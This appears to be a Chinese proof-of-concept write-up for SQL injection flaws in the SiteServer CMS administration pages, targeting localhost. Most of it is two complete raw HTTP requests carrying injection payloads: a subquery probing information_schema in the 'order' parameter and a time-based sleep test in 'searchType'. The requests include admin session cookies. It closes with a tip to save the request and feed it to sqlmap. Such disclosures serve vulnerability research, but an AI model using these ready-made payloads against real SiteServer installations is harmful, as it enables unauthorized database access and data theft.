GET /SiteServer/settings/pageAdministrator.aspx?areaId=0&departmentId=0&keyword=1&lastActivityDate=3&order=1%2C(select%20case%20when%20(3*2*1=6%20AND%2000043=00043)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)=1&pageNum=50&roleName= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/SiteServer/main.cshtml?siteId=1
Connection: keep-alive
Cookie: ASP.NET_SessionId=5vyakqhuu2rtwvblnorygurc;SS-ADMIN-TOKEN=rYwhRlUy1A0slash0c0add0oVj4VDE0CvBAX85G2dBwa93TmwEkeruzsEkVZiNgMXXO0add0Sl6esIB128JOJDb78vG3Z9PkosNmcFsDsr19aCI9HXJmpu2MBtJqFRNsLzcRl5z0slash0m0add0ClsU6wxc4myMoLvhfjQ5klJmGwSvad0add0cUpWcO7EvcWRt5wavRiqfmxkLcBT4B4MtqIHEBOx4MVHwhbYGuDIM1MCnPGQ71DkgWDj6ii40add03VdXQnk0equals00secret0;SS-LOGIN-CAPTCHA=UxpHCdBy2cs0equals00secret0;http://127.0.0.1/api/pages/cms/contents?siteId=1&channelId=1&page=1&1550057121935;BaiRong_Message_Success=;BaiRong_Message_Error=i0add00slash0bUAz0add01XI2hZN8pRsYpOmkzeTQsRVlYSaVFiYYWhOnhpyKRNQlNw0equals00equals00secret0;BaiRong_Message_Info=WcVtq4mIguwAo2bGhcDt3Obpq790fuRLlT7SS6pI6rratdyRYvSQRFP42DK2gt2MH95POIgqPr2KgC1z40LtkBjF4I8A0slash06HZxrLk4z6YKWVsQU9vowYbppQphC5BUQ074Cs2sF6ATDEU9bWoiVNWudY0add020slash0EuT0gmVl93NcNxFg3kUJweDyL3ILbOMbGdbic62onCmXi3cXszjOGSPpGQbQ0equals00equals00secret0;pageRoleAdd=TbRoleName%3A%2CCblPermissions_0%3Atrue%2CCblPermissions_0%3Afalse%2CCblPermissions_1%3Atrue%2CCblPermissions_2%3Atrue%2CCblPermissions_3%3Atrue%2CCblPermissions_4%3Atrue%2CCblPermissions_5%3Atrue%2CCblPermissions_6%3Atrue%2CCblPermissions_7%3Atrue%2CCblPermissions_8%3Atrue
Accept: */*
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

POC_3

searchType参数注入:

GET /SiteServer/settings/pageUser.aspx?creationDate=0&groupId=-1&keyword=&lastActivityDate=0&loginCount=0&pageNum=0&searchType=if(now()=sysdate()%2Csleep(0)%2C0) HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/SiteServer/main.cshtml?siteId=1
Connection: keep-alive
Cookie: ASP.NET_SessionId=5vyakqhuu2rtwvblnorygurc;SS-ADMIN-TOKEN=rYwhRlUy1A0slash0c0add0oVj4VDE0CvBAX85G2dBwa93TmwEkeruzsEkVZiNgMXXO0add0Sl6esIB128JOJDb78vG3Z9PkosNmcFsDsr19aCI9HXJmpu2MBtJqFRNsLzcRl5z0slash0m0add0ClsU6wxc4myMoLvhfjQ5klJmGwSvad0add0cUpWcO7EvcWRt5wavRiqfmxkLcBT4B4MtqIHEBOx4MVHwhbYGuDIM1MCnPGQ71DkgWDj6ii40add03VdXQnk0equals00secret0;SS-LOGIN-CAPTCHA=UxpHCdBy2cs0equals00secret0;http://127.0.0.1/api/pages/cms/contents?siteId=1&channelId=1&page=1&1550057121935;BaiRong_Message_Success=;BaiRong_Message_Error=idkTNpaibsTVOTWNCIYHopjR5DQok0slash0MiixTCRtA1Zi2oDmbbNohhlKgAT5oxdRRk5mawKRRDf7Q0equals00secret0;BaiRong_Message_Info=UKZD9ATQy1nIqXl6UMdKcFsqBWz6W0slash0zZwF0slash0zI3H3S1ea5xO1a8CH7GpPOgZfjceddzeRpe48tG620add0EfzngiL4RR0add0BLDmBmrHA4oDI8fhFDyFUeOim0tQGOg0add0YlAUpat9fZhvQT8yO4eGOcly70slash0OSdQ0equals00equals00secret0;pageRoleAdd=TbRoleName%3A%2CCblPermissions_0%3Atrue%2CCblPermissions_0%3Afalse%2CCblPermissions_1%3Atrue%2CCblPermissions_2%3Atrue%2CCblPermissions_3%3Atrue%2CCblPermissions_4%3Atrue%2CCblPermissions_5%3Atrue%2CCblPermissions_6%3Atrue%2CCblPermissions_7%3Atrue%2CCblPermissions_8%3Atrue
Accept: */*
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Poc_1 漏洞证明截图:

sqlmap -r inject.txt

特别提醒 复现时先访问Poc中的地址 将数据包保存下来再丢给sqlmap跑即可

源链接

Hacking more

...